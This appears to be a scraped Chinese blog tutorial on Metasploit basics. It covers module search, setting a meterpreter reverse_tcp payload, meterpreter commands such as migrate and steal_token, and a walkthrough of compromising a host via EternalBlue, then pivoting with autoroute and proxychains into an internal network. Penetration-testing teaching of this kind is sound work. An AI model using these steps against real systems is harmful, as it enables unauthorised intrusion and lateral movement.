msf使用基础

前言

msf是后渗透神奇,在kali中已经内置有。

1.1 基础使用
metasploit程序需要使用postgresql数据库

手动启动数据库:

service postgresql start

设置成开机启动数据库:

systemctl enable postgresql

启动msf

msfconsole

1.2.查找模块

search 模块名
//比如我要找永恒之蓝 search ms17_010

msf使用基础
使用那个模块 use 模块名或use 前面的数字都可以
msf使用基础msf使用基础
1.3使用模块

#查看要设置的参数
show options
#查看模块详情
info
#设置载荷  有很多可以自行选择
 set payload windows/x64/meterpreter/reverse_tcp

msf使用基础
msf使用基础
msf使用基础

#运行模块
run 或者 exploit

msf使用基础
msf使用基础
1.4.命令行模式的一些基础操作
输入help可以查看支持的操作,但是乱码了,莫慌,可以解决。
msf使用基础
输入 chcp 65001
msf使用基础
乱码没有了

核心后台脚本:

​		bgkill       关闭一个后台的meterpreter脚本

​		bglist	   列出所有正在运行的后台脚本

​		bgrun	   将一个meterpreter脚本以后台线程模式运行

​		channel   显示或者控制一个活动频道

​		close 		关闭一个频道

​		exit			终止meterpreter会话

​		get_timeouts	获得当前会话的timeout值

		getuid			查看当前权限

​		help			帮助菜单

​		info 			显示post模块信息

​		irb				进入ruby脚本模式

​		load			加载meterpreter扩展

​		migrate	   将会话迁移到一个指定PID的进程

​		quit			 结束meterpreter会话

​		read			从频道中读取数据

​		resource	运行文件中的命令

​		run 			执行一个meterpreter脚本或者post模块

​		sessions    快速地切换到另一个会话

​		background	切换到后台

		run checkvm  查看是否是虚拟机

		steal_token 伪造身份

伪造身份:
msf使用基础
2.1实战演示

msf使用基础

  • 通过永恒之蓝拿到跳板机
    msf使用基础
  • 拿到跳板机之后添加路由
    msf使用基础
添加攻击IP添加到目标机路由表中

也可以 run autoroute -s 10.10.10.0/24

或者手动添加

route add 10.10.10.0 255.255.255.0
  • 接下来设置代理
    msf使用基础

接下来用kali上的神奇proxychains

vi /etc/proxychains.conf

msf使用基础
测试是否能连内网的机器
msf使用基础
可以成功连接
通过代理工具开启msf
msf使用基础
接下来就可以直接搞内网了。实战中可能有多层网段。就需要挂多层代理

msf中有很多 攻击载荷模块,嗅探模块和后渗透模块。大家后期可以深入的去研究研究。

上一篇:Metasploit系列----未知目标测试


下一篇:緊急流出!我會進入!手把手教你入门内网渗透(渗透入门必看)